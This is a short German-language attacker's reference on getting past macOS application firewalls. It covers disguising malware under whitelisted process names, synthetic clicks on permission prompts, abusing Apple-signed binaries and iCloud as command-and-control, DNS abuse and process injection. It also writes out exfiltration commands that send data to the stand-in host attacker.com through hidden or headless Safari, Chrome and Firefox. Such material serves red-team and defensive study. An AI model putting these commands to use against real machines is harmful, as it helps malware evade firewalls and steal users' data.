macOS Bypassing Firewalls

Gefundene Techniken

Die folgenden Techniken wurden in einigen macOS-Firewall-Apps als funktionierend gefunden.

Missbrauch von Whitelist-Namen

• Zum Beispiel das Malware mit Namen bekannter macOS-Prozesse wie launchd aufrufen

Synthetischer Klick

• Wenn die Firewall den Benutzer um Erlaubnis bittet, lassen Sie die Malware auf Erlauben klicken

Verwenden Sie von Apple signierte Binärdateien

• Wie curl, aber auch andere wie whois

Bekannte Apple-Domains

Die Firewall könnte Verbindungen zu bekannten Apple-Domains wie apple.com oder icloud.com zulassen. Und iCloud könnte als C2 verwendet werden.

Generisches Umgehen

Einige Ideen, um zu versuchen, Firewalls zu umgehen

Überprüfen Sie den erlaubten Datenverkehr

Zu wissen, welcher Datenverkehr erlaubt ist, hilft Ihnen, potenziell auf die Whitelist gesetzte Domains oder welche Anwendungen Zugriff darauf haben, zu identifizieren.

lsof -i TCP -sTCP:ESTABLISHED

Missbrauch von DNS

DNS-Auflösungen erfolgen über die signierte Anwendung mdnsreponder, die wahrscheinlich berechtigt ist, DNS-Server zu kontaktieren.

Über Browser-Apps

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via Prozesseinjektionen

Wenn Sie Code in einen Prozess injizieren können, der berechtigt ist, eine Verbindung zu einem beliebigen Server herzustellen, könnten Sie die Firewall-Schutzmaßnahmen umgehen:

Referenzen

• https://www.youtube.com/watch?v=UlT5KFTMn2k